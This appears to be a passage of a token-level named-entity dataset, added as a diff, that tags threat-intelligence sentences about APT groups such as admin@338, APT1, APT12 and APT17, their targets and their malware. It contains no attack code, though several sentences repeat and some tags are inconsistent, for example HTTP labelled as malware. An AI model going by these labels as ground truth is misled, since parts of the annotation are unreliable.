+FIN5 S-APT
+is O
+a O
+financially O
+motivated O
+threat O
+group O
+that O
+has O
+targeted O
+personally O
+identifiable O
+information O
+and O
+payment O
+card O
+information O
+. O
+
+The O
+group O
+has O
+been O
+active O
+since O
+at O
+least O
+2008 S-TIME
+and O
+has O
+targeted O
+the O
+restaurant O
+, O
+gaming O
+, O
+and O
+hotel O
+industries O
+. O
+
+The O
+group O
+is O
+made O
+up O
+of O
+actors O
+who O
+likely O
+speak O
+Russian O
+. O
+
+FIN6 S-APT
+: O
+ITG08 S-APT
+. O
+
+FIN6 S-APT
+is O
+a O
+cyber O
+crime O
+group O
+that O
+has O
+stolen O
+payment O
+card O
+data O
+and O
+sold O
+it O
+for O
+profit O
+on O
+underground O
+marketplaces O
+. O
+
+This O
+group O
+has O
+aggressively O
+targeted O
+and O
+compromised O
+point O
+of O
+sale O
+( O
+PoS O
+) O
+systems O
+in O
+the O
+hospitality O
+and O
+retail O
+sectors O
+. O
+
+Leviathan S-APT
+: O
+TEMP.Jumper S-APT
+, O
+APT40 S-APT
+, O
+TEMP.Periscope S-APT
+. O
+
+Leviathan S-APT
+is O
+a O
+cyber O
+espionage O
+group O
+that O
+has O
+been O
+active O
+since O
+at O
+least O
+2013 S-TIME
+. O
+
+The O
+group O
+generally O
+targets O
+defense O
+and O
+government O
+organizations O
+, O
+but O
+has O
+also O
+targeted O
+a O
+range O
+of O
+industries O
+including O
+engineering O
+firms O
+, O
+shipping O
+and O
+transportation O
+, O
+manufacturing O
+, O
+defense O
+, O
+government O
+offices O
+, O
+and O
+research O
+universities O
+in O
+the O
+United B-LOC
+States E-LOC
+, O
+Western B-LOC
+Europe E-LOC
+, O
+and O
+along O
+the O
+South B-LOC
+China I-LOC
+Sea E-LOC
+. O
+
+Lotus B-APT
+Blossom E-APT
+: O
+DRAGONFISH S-APT
+, O
+Spring B-APT
+Dragon E-APT
+. O
+
+Lotus B-APT
+Blossom E-APT
+is O
+a O
+threat O
+group O
+that O
+has O
+targeted O
+government O
+and O
+military O
+organizations O
+in O
+Southeast B-LOC
+Asia E-LOC
+. O
+
+Machete S-APT
+: O
+El B-APT
+Machete E-APT
+. O
+
+Machete S-APT
+is O
+a O
+group O
+that O
+has O
+been O
+active O
+since O
+at O
+least O
+2010 S-TIME
+, O
+targeting O
+high-profile O
+government O
+entities O
+in O
+Latin B-LOC
+American I-LOC
+countries E-LOC
+. O
+
+admin@338 S-APT
+is O
+a O
+China S-LOC
+based O
+cyber O
+threat O
+group O
+. O
+
+It O
+has O
+previously O
+used O
+newsworthy O
+events O
+as O
+lures O
+to O
+deliver O
+malware O
+and O
+has O
+primarily O
+targeted O
+organizations O
+involved O
+in O
+financial O
+, O
+economic O
+, O
+and O
+trade O
+policy O
+, O
+typically O
+using O
+publicly O
+available O
+RATs S-MAL
+such O
+as O
+PoisonIvy S-MAL
+, O
+as O
+well O
+as O
+some O
+non-public B-MAL
+backdoors E-MAL
+. O
+
+APT1 S-APT
+: O
+Comment B-APT
+Crew E-APT
+, O
+Comment B-APT
+Group E-APT
+, O
+Comment B-APT
+Panda E-APT
+. O
+
+APT1 S-APT
+is O
+a O
+Chinese O
+threat O
+group O
+that O
+has O
+been O
+attributed O
+to O
+the O
+2nd B-IDTY
+Bureau I-IDTY
+of I-IDTY
+the I-IDTY
+People I-IDTY
+’s I-IDTY
+Liberation I-IDTY
+Army E-IDTY
+( O
+PLA S-IDTY
+) O
+General B-IDTY
+Staff I-IDTY
+Department I-IDTY
+’s E-IDTY
+( O
+GSD S-IDTY
+) O
+3rd B-IDTY
+Department E-IDTY
+, O
+commonly O
+known O
+by O
+its O
+Military B-IDTY
+Unit I-IDTY
+Cover I-IDTY
+Designator E-IDTY
+( O
+MUCD S-IDTY
+) O
+as O
+Unit B-IDTY
+61398 E-IDTY
+. O
+
+APT12 S-APT
+: O
+IXESHE S-APT
+, O
+DynCalc S-APT
+, O
+Numbered B-APT
+Panda E-APT
+, O
+DNSCALC S-APT
+. O
+
+APT12 S-APT
+is O
+a O
+threat O
+group O
+that O
+has O
+been O
+attributed O
+to O
+China S-LOC
+. O
+
+The O
+group O
+has O
+targeted O
+a O
+variety O
+of O
+victims O
+including O
+but O
+not O
+limited O
+to O
+media B-IDTY
+outlets E-IDTY
+, O
+high-tech B-IDTY
+companies E-IDTY
+, O
+and O
+multiple B-IDTY
+governments E-IDTY
+. O
+
+The O
+admin@338 S-APT
+has O
+largely O
+targeted O
+organizations O
+involved O
+in O
+financial S-IDTY
+, O
+economic S-IDTY
+and O
+trade B-IDTY
+policy E-IDTY
+, O
+typically O
+using O
+publicly O
+available O
+RATs S-MAL
+such O
+as O
+Poison B-MAL
+Ivy E-MAL
+, O
+as O
+well O
+some O
+non-public B-MAL
+backdoors E-MAL
+. O
+
+The O
+admin@338 S-APT
+started O
+targeting O
+Hong B-LOC
+Kong E-LOC
+media B-IDTY
+companies E-IDTY
+, O
+probably O
+in O
+response O
+to O
+political S-IDTY
+and O
+economic S-IDTY
+challenges O
+in O
+Hong B-LOC
+Kong E-LOC
+and O
+China S-LOC
+. O
+
+Multiple O
+China-based S-LOC
+cyber O
+threat O
+groups O
+have O
+targeted O
+international B-IDTY
+media I-IDTY
+organizations E-IDTY
+in O
+the O
+past O
+. O
+
+The O
+admin@338 S-APT
+has O
+targeted O
+international B-IDTY
+media I-IDTY
+organizations E-IDTY
+in O
+the O
+past O
+. O
+
+In O
+August B-TIME
+2015 E-TIME
+, O
+the O
+admin@338 S-APT
+sent O
+spear B-ACT
+phishing E-ACT
+emails S-TOOL
+to O
+a O
+number O
+of O
+Hong O
+Kong-based O
+media B-IDTY
+organizations E-IDTY
+, O
+including O
+newspapers O
+, O
+radio O
+, O
+and O
+television O
+. O
+
+In O
+August B-TIME
+2015 E-TIME
+, O
+the O
+threat O
+actors S-APT
+sent O
+spear B-ACT
+phishing E-ACT
+emails S-TOOL
+to O
+a O
+number O
+of O
+Hong O
+Kong-based O
+media B-IDTY
+organizations E-IDTY
+, O
+including O
+newspapers O
+, O
+radio O
+, O
+and O
+television O
+. O
+
+In O
+August B-TIME
+2015 E-TIME
+, O
+the O
+admin@338 S-APT
+sent O
+spear B-ACT
+phishing E-ACT
+emails S-TOOL
+to O
+a O
+number O
+of O
+Hong O
+Kong-based O
+media B-IDTY
+organizations E-IDTY
+. O
+
+The O
+admin@338 S-APT
+previous O
+activities S-ACT
+against O
+financial S-IDTY
+and O
+policy B-IDTY
+organizations E-IDTY
+have O
+largely O
+focused O
+on O
+spear B-ACT
+phishing E-ACT
+emails S-TOOL
+written O
+in O
+English O
+, O
+destined O
+for O
+Western S-LOC
+audiences S-IDTY
+. O
+
+Once O
+the O
+LOWBALL S-MAL
+malware S-MAL
+calls O
+back O
+to O
+the O
+Dropbox S-TOOL
+account O
+, O
+the O
+admin@338 S-APT
+will O
+create O
+a O
+file O
+called O
+upload.bat S-FILE
+which O
+contains O
+commands O
+to O
+be O
+executed O
+on O
+the O
+compromised O
+computer O
+. O
+
+We O
+observed O
+the O
+admin@338 S-APT
+upload O
+a O
+second O
+stage O
+malware O
+, O
+known O
+as O
+BUBBLEWRAP S-MAL
+( O
+also O
+known O
+as O
+Backdoor.APT.FakeWinHTTPHelper S-MAL
+) O
+to O
+their O
+Dropbox S-TOOL
+account O
+along O
+with O
+the O
+following O
+command O
+. O
+
+We O
+have O
+previously O
+observed O
+the O
+admin@338 B-APT
+group E-APT
+use O
+BUBBLEWRAP S-MAL
+. O
+
+The O
+LOWBALL S-MAL
+first O
+stage O
+malware O
+allows O
+the O
+group O
+to O
+collect O
+information O
+from O
+victims O
+and O
+then O
+deliver O
+the O
+BUBBLEWRAP S-MAL
+second O
+stage O
+malware O
+to O
+their O
+victims O
+after O
+verifying O
+that O
+they O
+are O
+indeed O
+interesting O
+targets O
+. O
+
+The O
+admin@338 S-APT
+linked O
+to O
+China S-LOC
+and O
+alleged O
+to O
+be O
+responsible O
+for O
+targeted B-ACT
+attacks E-ACT
+against O
+foreign O
+governments S-IDTY
+and O
+ministries E-IDTY
+, O
+has O
+now O
+pointed O
+its O
+focus O
+inward O
+at O
+China S-LOC
+autonomous O
+territory O
+Hong B-LOC
+Kong E-LOC
+. O
+
+An O
+APT O
+gang S-APT
+linked O
+to O
+China S-LOC
+and O
+alleged O
+to O
+be O
+responsible O
+for O
+targeted B-ACT
+attacks E-ACT
+against O
+foreign O
+governments S-IDTY
+and O
+ministries E-IDTY
+, O
+has O
+now O
+pointed O
+its O
+focus O
+inward O
+at O
+China S-LOC
+autonomous O
+territory O
+Hong B-LOC
+Kong E-LOC
+. O
+
+The O
+group O
+targeting O
+Hong B-LOC
+Kong E-LOC
+media S-IDTY
+outlets O
+is O
+called O
+admin@338 S-APT
+and O
+is O
+known O
+to O
+researchers O
+for O
+using O
+publicly O
+available O
+remote B-MAL
+access I-MAL
+Trojans E-MAL
+such O
+as O
+Poison B-MAL
+Ivy E-MAL
+to O
+attack O
+government S-IDTY
+and O
+financial B-IDTY
+firms E-IDTY
+specializing O
+in O
+global B-IDTY
+economic E-IDTY
+policy O
+. O
+
+The O
+agroup S-APT
+targeting O
+Hong B-LOC
+Kong E-LOC
+media S-IDTY
+outlets O
+is O
+called O
+admin@338 S-APT
+and O
+is O
+known O
+to O
+researchers O
+for O
+using O
+publicly O
+available O
+remote B-MAL
+access I-MAL
+Trojans E-MAL
+such O
+as O
+Poison B-MAL
+Ivy E-MAL
+to O
+attack O
+government S-IDTY
+and O
+financial B-IDTY
+firms E-IDTY
+specializing O
+in O
+global B-IDTY
+economic E-IDTY
+policy O
+. O
+
+The O
+admin@338 S-APT
+, O
+active O
+since O
+2008 S-TIME
+, O
+has O
+been O
+seen O
+targeting O
+organizations O
+in O
+the O
+financial B-IDTY
+services E-IDTY
+, O
+telecoms S-IDTY
+, O
+government S-IDTY
+, O
+and O
+defense B-IDTY
+sectors E-IDTY
+. O
+
+The O
+APT B-APT
+actor E-APT
+, O
+active O
+since O
+2008 S-TIME
+, O
+has O
+been O
+seen O
+targeting O
+organizations O
+in O
+the O
+financial B-IDTY
+services E-IDTY
+, O
+telecoms S-IDTY
+, O
+government S-IDTY
+, O
+and O
+defense B-IDTY
+sectors E-IDTY
+. O
+
+In O
+August B-TIME
+2013 E-TIME
+, O
+FireEye S-SECTEAM
+reported O
+that O
+admin@338 S-APT
+had O
+been O
+using O
+the O
+Poison B-MAL
+Ivy I-MAL
+RAT E-MAL
+in O
+its O
+operations O
+. O
+
+In O
+March B-TIME
+2014 E-TIME
+, O
+the O
+admin@338 S-APT
+leveraged O
+the O
+disappearance O
+of O
+Malaysia O
+Airlines O
+Flight O
+MH370 O
+to O
+target O
+a O
+government S-IDTY
+in O
+the O
+Asia-Pacific S-LOC
+region O
+and O
+a O
+US-based S-LOC
+think B-IDTY
+tank E-IDTY
+. O
+
+In O
+March B-TIME
+2014 E-TIME
+, O
+the O
+group O
+leveraged O
+the O
+disappearance O
+of O
+Malaysia O
+Airlines O
+Flight O
+MH370 O
+to O
+target O
+a O
+government S-IDTY
+in O
+the O
+Asia-Pacific S-LOC
+region O
+and O
+a O
+US-based S-LOC
+think B-IDTY
+tank E-IDTY
+. O
+
+According O
+to O
+FireEye S-SECTEAM
+, O
+the O
+admin@338 S-APT
+sent O
+out O
+emails S-TOOL
+containing O
+malicious O
+documents O
+designed O
+to O
+exploit S-VULNAME
+Microsoft B-IDTY
+Office E-IDTY
+vulnerabilities S-VULNAME
+in O
+an O
+effort O
+to O
+deliver O
+a O
+piece O
+of O
+malware O
+dubbed O
+LOWBALL S-MAL
+. O
+
+According O
+to O
+FireEye S-SECTEAM
+, O
+the O
+attackers S-APT
+sent O
+out O
+emails S-TOOL
+containing O
+malicious O
+documents O
+designed O
+to O
+exploit S-VULNAME
+Microsoft B-IDTY
+Office E-IDTY
+vulnerabilities S-VULNAME
+in O
+an O
+effort O
+to O
+deliver O
+a O
+piece O
+of O
+malware O
+dubbed O
+LOWBALL S-MAL
+. O
+
+The O
+admin@338 S-APT
+'s O
+Dropbox S-TOOL
+accounts O
+have O
+also O
+been O
+found O
+to O
+contain O
+a O
+different O
+backdoor O
+dubbed O
+BUBBLEWRAP S-MAL
+. O
+
+Researchers O
+have O
+pointed O
+out O
+that O
+it O
+is O
+not O
+uncommon O
+for O
+China-based S-LOC
+threat B-APT
+groups E-APT
+to O
+target O
+Hong B-LOC
+Kong E-LOC
+media B-IDTY
+organizations E-IDTY
+, O
+particularly O
+ones O
+whose O
+reporting O
+focuses O
+on O
+the O
+pro-democracy O
+movement O
+. O
+
+Researchers O
+have O
+pointed O
+out O
+that O
+it O
+is O
+not O
+uncommon O
+for O
+admin@338 S-APT
+to O
+target O
+Hong B-LOC
+Kong E-LOC
+media B-IDTY
+organizations E-IDTY
+, O
+particularly O
+ones O
+whose O
+reporting O
+focuses O
+on O
+the O
+pro-democracy O
+movement O
+. O
+
+This O
+week O
+the O
+experts O
+at O
+FireEye S-SECTEAM
+discovered O
+that O
+a O
+group O
+of O
+Chinese-based S-LOC
+hackers O
+called O
+admin@338 S-APT
+had O
+sent O
+multiple O
+MH370-themed O
+spear B-ACT
+phishing E-ACT
+emails S-TOOL
+, O
+the O
+attackers S-APT
+targeted O
+government B-IDTY
+officials E-IDTY
+in O
+Asia-Pacific S-LOC
+, O
+it O
+is O
+likely O
+for O
+cyber B-APT
+espionage E-APT
+purpose O
+. O
+
+The O
+attackers S-APT
+used O
+the O
+popular O
+Poison B-MAL
+Ivy I-MAL
+RAT E-MAL
+and O
+WinHTTPHelper S-MAL
+malware S-MAL
+to O
+compromise O
+the O
+computers O
+of O
+government B-IDTY
+officials E-IDTY
+. O
+
+The O
+admin@338 S-APT
+used O
+the O
+popular O
+Poison B-MAL
+Ivy I-MAL
+RAT E-MAL
+and O
+WinHTTPHelper S-MAL
+malware S-MAL
+to O
+compromise O
+the O
+computers O
+of O
+government B-IDTY
+officials E-IDTY
+. O
+
+FireEye S-SECTEAM
+analysts O
+documented O
+the O
+admin@338 B-APT
+group E-APT
+'s O
+activities S-ACT
+in O
+a O
+previous O
+paper O
+titled O
+Poison B-MAL
+Ivy E-MAL
+: O
+Assessing O
+Damage O
+and O
+Extracting O
+Intelligence O
+paper O
+. O
+
+The O
+spear-phishing S-ACT
+campaign E-ACT
+against O
+Asian S-LOC
+entities O
+isn't O
+isolated O
+, O
+the O
+admin@338 S-APT
+also O
+started O
+another O
+attack O
+against O
+the O
+US-based S-LOC
+think B-IDTY
+tank E-IDTY
+on O
+14th B-TIME
+March E-TIME
+. O
+
+Our O
+analysis O
+has O
+led O
+us O
+to O
+conclude O
+that O
+APT1 S-APT
+is O
+likely O
+government-sponsored O
+and O
+one O
+of O
+the O
+most O
+persistent O
+of O
+China S-LOC
+'s O
+cyber B-APT
+threat I-APT
+actors E-APT
+. O
+
+FireEye S-SECTEAM
+said O
+it O
+has O
+tracked O
+admin@338 S-APT
+'s O
+activity O
+since O
+2013 S-TIME
+and O
+the O
+group O
+has O
+largely O
+targeted O
+organizations O
+involved O
+in O
+financial S-IDTY
+, O
+economic S-IDTY
+, O
+and O
+trade B-IDTY
+policy E-IDTY
+. O
+
+The O
+simplest O
+conclusion O
+based O
+on O
+these O
+facts O
+is O
+that O
+APT1 S-APT
+is O
+operating O
+in O
+China S-LOC
+, O
+and O
+most O
+likely O
+in O
+Shanghai S-LOC
+. O
+
+These O
+data O
+sets O
+show O
+that O
+APT1 S-APT
+is O
+either O
+operating O
+in O
+China S-LOC
+during O
+normal O
+Chinese S-LOC
+business O
+hours O
+or O
+that O
+APT1 S-APT
+is O
+intentionally O
+going O
+to O
+painstaking O
+lengths O
+to O
+look O
+like O
+they O
+are O
+. O
+
+APT1 S-APT
+has O
+used O
+and O
+steadily O
+modified O
+BISCUIT S-MAL
+since O
+as O
+early O
+as O
+2007 S-TIME
+and O
+continues O
+to O
+use O
+it O
+presently O
+. O
+
+While O
+APT1 S-APT
+intruders O
+occasionally O
+use O
+publicly B-MAL
+available I-MAL
+backdoors E-MAL
+such O
+as O
+Poison B-MAL
+Ivy E-MAL
+and O
+Gh0st B-MAL
+RAT E-MAL
+. O
+
+Given O
+the O
+mission O
+, O
+resourcing O
+, O
+and O
+location O
+of O
+PLA B-APT
+Unit I-APT
+61398 E-APT
+, O
+we O
+conclude O
+that O
+PLA B-APT
+Unit I-APT
+61398 E-APT
+is O
+APT1 S-APT
+. O
+
+APT1 S-APT
+were O
+a O
+highly O
+prolific O
+cyber-attack O
+group O
+operating O
+out O
+of O
+China S-LOC
+. O
+
+APT1 S-APT
+is O
+a O
+China-based S-LOC
+cyber-espionage S-ACT
+group O
+, O
+active O
+since O
+mid-2006 S-TIME
+. O
+
+APT12 S-APT
+'s O
+targets O
+are O
+consistent O
+with O
+larger O
+People B-LOC
+'s I-LOC
+Republic I-LOC
+of I-LOC
+China E-LOC
+( O
+PRC S-LOC
+) O
+goals O
+. O
+
+Since O
+the O
+release O
+of O
+the O
+Arbor S-SECTEAM
+blog O
+post O
+, O
+FireEye S-SECTEAM
+has O
+observed O
+APT12 S-APT
+use O
+a O
+modified O
+backdoor O
+that O
+we O
+call O
+HIGHTIDE S-MAL
+. O
+
+However O
+, O
+the O
+malware O
+shared O
+several O
+traits O
+with O
+the O
+RIPTIDE S-MAL
+and O
+HIGHTIDE B-MAL
+backdoor E-MAL
+that O
+we O
+have O
+attributed O
+to O
+APT12 S-APT
+. O
+
+From O
+October B-TIME
+2012 E-TIME
+to O
+May B-TIME
+2014 E-TIME
+, O
+FireEye S-SECTEAM
+observed O
+APT12 S-APT
+utilizing O
+RIPTIDE S-MAL
+, O
+that O
+communicates O
+via O
+HTTP S-MAL
+to O
+a O
+hard-coded O
+command O
+and O
+control O
+( O
+C2 S-TOOL
+) O
+server O
+. O
+
+Similar O
+to O
+RIPTIDE B-ACT
+campaigns E-ACT
+, O
+APT12 S-APT
+infects O
+target O
+systems O
+with O
+HIGHTIDE S-MAL
+using O
+a O
+Microsoft B-TOOL
+Word E-TOOL
+( O
+.doc S-FILE
+) O
+document O
+that O
+exploits O
+CVE-2012-0158 S-VULID
+. O
+
+FireEye S-SECTEAM
+believes O
+the O
+change O
+from O
+RIPTIDE S-MAL
+to O
+HIGHTIDE S-MAL
+represents O
+a O
+temporary O
+tool O
+shift O
+to O
+decrease O
+malware O
+detection O
+while O
+APT12 S-APT
+developed O
+a O
+completely O
+new O
+malware O
+toolset O
+. O
+
+They O
+have O
+largely O
+targeted O
+organizations O
+involved O
+in O
+financial S-IDTY
+, O
+economic S-IDTY
+and O
+trade B-IDTY
+policy E-IDTY
+, O
+typically O
+using O
+publicly O
+available O
+RATs S-MAL
+such O
+as O
+Poison B-MAL
+Ivy E-MAL
+, O
+as O
+well O
+some O
+non-public B-MAL
+backdoors E-MAL
+. O
+
+A O
+China-based S-LOC
+cyber O
+threat O
+group O
+, O
+which O
+FireEye S-SECTEAM
+tracks O
+as O
+an O
+uncategorized O
+advanced O
+persistent O
+threat O
+( O
+APT O
+) O
+group O
+and O
+other O
+researchers O
+refer O
+to O
+as O
+admin@338 S-APT
+, O
+may O
+have O
+conducted O
+the O
+activity O
+. O
+
+The O
+group O
+previous O
+activities S-ACT
+against O
+financial S-IDTY
+and O
+policy B-IDTY
+organizations E-IDTY
+have O
+largely O
+focused O
+on O
+spear B-ACT
+phishing E-ACT
+emails S-TOOL
+written O
+in O
+English O
+, O
+destined O
+for O
+Western S-LOC
+audiences S-IDTY
+. O
+
+About O
+four O
+months O
+after O
+The B-IDTY
+New I-IDTY
+York I-IDTY
+Times E-IDTY
+publicized O
+an O
+attack O
+on O
+its O
+network O
+, O
+the O
+APT12 S-APT
+behind O
+the O
+intrusion O
+deployed O
+updated O
+versions O
+of O
+their O
+Backdoor.APT.Aumlib S-MAL
+and O
+Backdoor.APT.Ixeshe B-MAL
+malware I-MAL
+families E-MAL
+. O
+
+With O
+this O
+in O
+mind O
+, O
+this O
+week O
+we O
+are O
+providing O
+some O
+indicators O
+for O
+a O
+China S-LOC
+based O
+adversary O
+who O
+we O
+crypt O
+as O
+" O
+NUMBERED B-APT
+PANDA E-APT
+" O
+Numbered B-APT
+Panda E-APT
+has O
+a O
+long O
+list O
+of O
+high-profile O
+victims O
+and O
+is O
+known O
+by O
+a O
+number O
+of O
+names O
+including O
+: O
+DYNCALC S-APT
+, O
+IXESHE S-APT
+, O
+JOY B-APT
+RAT E-APT
+, O
+APT-12 S-APT
+, O
+etc O
+. O
+
+Numbered B-APT
+Panda E-APT
+has O
+a O
+long O
+list O
+of O
+high-profile O
+victims O
+and O
+is O
+known O
+by O
+a O
+number O
+of O
+names O
+including O
+: O
+DYNCALC S-APT
+, O
+IXESHE S-APT
+, O
+JOY B-APT
+RAT E-APT
+, O
+APT-12 S-APT
+, O
+etc O
+. O
+
+The O
+new O
+campaigns S-ACT
+mark O
+the O
+first O
+significant O
+stirrings O
+from O
+the O
+APT12 S-APT
+since O
+it O
+went O
+silent O
+in O
+January S-TIME
+in O
+the O
+wake O
+of O
+a O
+detailed O
+expose O
+of O
+the O
+group O
+and O
+its O
+exploits O
+— O
+and O
+a O
+retooling O
+of O
+what O
+security O
+researchers O
+believe O
+is O
+a O
+massive O
+spying O
+operation O
+based O
+in O
+China S-LOC
+. O
+
+Between O
+November B-TIME
+26 I-TIME
+, I-TIME
+2015 E-TIME
+, O
+and O
+December B-TIME
+1 I-TIME
+, I-TIME
+2015 E-TIME
+, O
+known O
+and O
+suspected O
+China-based S-LOC
+APT16 S-APT
+launched O
+several O
+spear B-ACT
+phishing I-ACT
+attacks E-ACT
+targeting O
+Japan S-LOC
+and O
+Taiwan S-LOC
+in O
+the O
+high-tech S-IDTY
+, O
+government B-IDTY
+services E-IDTY
+, O
+media S-IDTY
+and O
+financial B-IDTY
+services I-IDTY
+industries E-IDTY
+. O
+
+Between O
+November B-TIME
+26 I-TIME
+, I-TIME
+2015 E-TIME
+, O
+and O
+December B-TIME
+1 I-TIME
+, I-TIME
+2015 E-TIME
+, O
+known O
+and O
+suspected O
+China-based S-LOC
+APT B-APT
+groups E-APT
+launched O
+several O
+spear B-ACT
+phishing I-ACT
+attacks E-ACT
+targeting O
+Japanese S-LOC
+and O
+Taiwanese S-LOC
+organizations O
+in O
+the O
+high-tech S-IDTY
+, O
+government B-IDTY
+services E-IDTY
+, O
+media S-IDTY
+and O
+financial B-IDTY
+services I-IDTY
+industries E-IDTY
+. O
+
+On O
+November B-TIME
+26 I-TIME
+, I-TIME
+2015 E-TIME
+, O
+a O
+suspected O
+China-based S-LOC
+APT16 S-APT
+sent O
+Japanese S-LOC
+defense O
+policy-themed O
+spear B-ACT
+phishing E-ACT
+emails S-TOOL
+to O
+multiple O
+Japanese S-LOC
+financial S-IDTY
+and O
+high-tech B-IDTY
+companies E-IDTY
+. O
+
+On O
+November B-TIME
+26 I-TIME
+, I-TIME
+2015 E-TIME
+, O
+a O
+suspected O
+China-based S-LOC
+APT O
+group O
+sent O
+Japanese S-LOC
+defense O
+policy-themed O
+spear B-ACT
+phishing E-ACT
+emails S-TOOL
+to O
+multiple O
+Japanese S-LOC
+financial S-IDTY
+and O
+high-tech B-IDTY
+companies E-IDTY
+. O
+
+While O
+attribution O
+of O
+the O
+first O
+two O
+spear B-ACT
+phishing I-ACT
+attacks E-ACT
+is O
+still O
+uncertain O
+, O
+we O
+attribute O
+the O
+second O
+December S-TIME
+phishing B-ACT
+campaign E-ACT
+to O
+the O
+China-based S-LOC
+APT O
+group O
+that O
+we O
+refer O
+to O
+as O
+APT16 S-APT
+. O
+
+APT16 B-APT
+actors E-APT
+sent O
+spear B-ACT
+phishing E-ACT
+emails S-TOOL
+to O
+two O
+Taiwanese S-LOC
+media B-IDTY
+organizations E-IDTY
+. O
+
+On O
+the O
+same O
+date O
+that O
+APT16 S-APT
+targeted O
+Taiwanese S-LOC
+media S-IDTY
+, O
+suspected O
+Chinese S-LOC
+APT B-APT
+actors E-APT
+also O
+targeted O
+a O
+Taiwanese S-LOC
+government B-IDTY
+agency E-IDTY
+, O
+sending O
+a O
+lure B-ACT
+document E-ACT
+that O
+contained O
+instructions O
+for O
+registration O
+and O
+subsequent O
+listing O
+of O
+goods O
+on O
+a O
+local O
+Taiwanese S-LOC
+auction O
+website O
+. O
+
+It O
+is O
+possible O
+, O
+although O
+not O
+confirmed O
+, O
+that O
+APT16 S-APT
+was O
+also O
+responsible O
+for O
+targeting O
+this O
+government B-IDTY
+agency E-IDTY
+, O
+given O
+both O
+the O
+timeframe O
+and O
+the O
+use O
+of O
+the O
+same O
+n-day O
+to O
+eventually O
+deploy O
+the O
+ELMER B-MAL
+backdoor E-MAL
+. O
+
+Despite O
+the O
+differing O
+sponsorship O
+, O
+penetration O
+of O
+Hong B-LOC
+Kong E-LOC
+and O
+Taiwan-based S-LOC
+media B-IDTY
+organizations E-IDTY
+continues O
+to O
+be O
+a O
+priority O
+for O
+China-based S-LOC
+APT16 S-APT
+. O
+
+The O
+suspected O
+APT16 S-APT
+targeting O
+of O
+the O
+Taiwanese S-LOC
+government B-IDTY
+agency E-IDTY
+– O
+in O
+addition O
+to O
+the O
+Taiwanese S-LOC
+media B-IDTY
+organizations E-IDTY
+– O
+further O
+supports O
+this O
+possibility O
+. O
+
+APT17 S-APT
+was O
+embedding O
+the O
+encoded O
+CnC O
+IP S-PROT
+address O
+for O
+the O
+BLACKCOFFEE S-MAL
+malware S-MAL
+in O
+legitimate O
+Microsoft S-IDTY
+TechNet O
+profiles O
+pages O
+and O
+forum O
+threads O
+, O
+a O
+method O
+some O
+in O
+the O
+information B-SECTEAM
+security I-SECTEAM
+community E-SECTEAM
+call O
+a O
+" O
+dead O
+drop O
+resolver O
+" O
+. O
+
+APT17 S-APT
+, O
+also O
+known O
+as O
+DeputyDog S-APT
+, O
+is O
+a O
+China-based S-LOC
+threat O
+group O
+that O
+FireEye B-SECTEAM
+Intelligence E-SECTEAM
+has O
+observed O
+conducting O
+network O
+intrusions O
+against O
+U.S. S-LOC
+government B-IDTY
+entities E-IDTY
+, O
+the O
+defense B-IDTY
+industry E-IDTY
+, O
+law B-IDTY
+firms E-IDTY
+, O
+information B-IDTY
+technology I-IDTY
+companies E-IDTY
+, O
+mining B-IDTY
+companies E-IDTY
+, O
+and O
+non-government B-IDTY
+organizations E-IDTY
+. O
+
+FireEye S-SECTEAM
+has O
+monitored O
+APT17 S-APT
+'s O
+use O
+of O
+BLACKCOFFEE S-MAL
+variants O
+since O
+2013 S-TIME
+to O
+masquerade O
+malicious O
+communication O
+as O
+normal O
+web O
+traffic O
+by O
+disguising O
+the O
+CnC O
+communication O
+as O
+queries O
+to O
+web O
+search O
+engines O
+. O
+
+The O
+use O
+of O
+BLACKCOFFEE S-MAL
+demonstrates O
+APT17 S-APT
+'s O
+evolving O
+use O
+of O
+public O
+websites O
+to O
+hide O
+in O
+plain O
+sight O
+. O
+
+TG-0416 S-APT
+is O
+a O
+stealthy O
+and O
+extremely O
+successful O
+Advanced O
+Persistent O
+Threat O
+( O
+APT O
+) O
+group O
+known O
+to O
+target O
+a O
+broad O
+range O
+of O
+verticals O
+since O
+at O
+least O
+2009 S-TIME
+, O
+including O
+technology S-IDTY
+, O
+industrial S-IDTY
+, O
+manufacturing S-IDTY
+, O
+human B-IDTY
+rights I-IDTY
+groups E-IDTY
+, O
+government S-IDTY
+, O
+pharmaceutical S-IDTY
+, O
+and O
+medical B-IDTY
+technology E-IDTY
+. O
+
+The O
+APT18 S-APT
+then O
+installed O
+the O
+hcdLoader B-MAL
+RAT E-MAL
+, O
+which O
+installs O
+as O
+a O
+Windows S-OS
+service O
+and O
+provides O
+command O
+line O
+access O
+to O
+the O
+compromised O
+system O
+. O
+
+The O
+malware O
+used O
+by O
+the O
+Wekby B-APT
+group E-APT
+has O
+ties O
+to O
+the O
+HTTPBrowser B-MAL
+malware I-MAL
+family E-MAL
+, O
+and O
+uses O
+DNS S-PROT
+requests O
+as O
+a O
+command O
+and O
+control O
+mechanism O
+. O
+
+These O
+URIs O
+result O
+in O
+the O
+download O
+of O
+an O
+installer O
+, O
+which O
+creates O
+a O
+PE O
+of O
+the O
+malware O
+typically O
+known O
+as O
+HTTPBrowser S-MAL
+, O
+but O
+called O
+Token B-MAL
+Control E-MAL
+by O
+the O
+Wekby B-APT
+group E-APT
+themselves O
+( O
+based O
+upon O
+the O
+PDB S-TOOL
+strings O
+found O
+within O
+many O
+of O
+the O
+samples O
+) O
+. O
+
+APT19 S-APT
+seemed O
+to O
+be O
+going O
+after O
+defense B-IDTY
+sector I-IDTY
+firms E-IDTY
+, O
+Chinese S-LOC
+dissident O
+groups O
+and O
+political S-IDTY
+, O
+financial S-IDTY
+, O
+pharmaceutical S-IDTY
+and O
+energy B-IDTY
+sectors E-IDTY
+that O
+could O
+benefit O
+the O
+Chinese S-LOC
+economy O
+. O
+
+APT19 S-APT
+seemed O
+to O
+be O
+going O
+after O
+defense B-IDTY
+sector I-IDTY
+firms E-IDTY
+, O
+Chinese S-LOC
+dissident O
+groups O
+and O
+other O
+political S-IDTY
+target O
+, O
+as O
+well O
+as O
+certain O
+financial S-IDTY
+targets O
+and O
+other O
+commercial S-IDTY
+targets O
+in O
+pharmaceutical S-IDTY
+and O
+energy B-IDTY
+sectors E-IDTY
+that O
+could O
+benefit O
+the O
+Chinese S-LOC
+economy O
+. O
+
+FANCY B-APT
+BEAR E-APT
+( O
+also O
+known O
+as O
+Sofacy S-APT
+or O
+APT28 S-APT
+) O
+is O
+a O
+separate O
+Russian-based S-LOC
+threat O
+actor O
+, O
+which O
+has O
+been O
+active O
+since O
+mid B-TIME
+2000s E-TIME
+, O
+and O
+has O
+been O
+responsible O
+for O
+targeted O
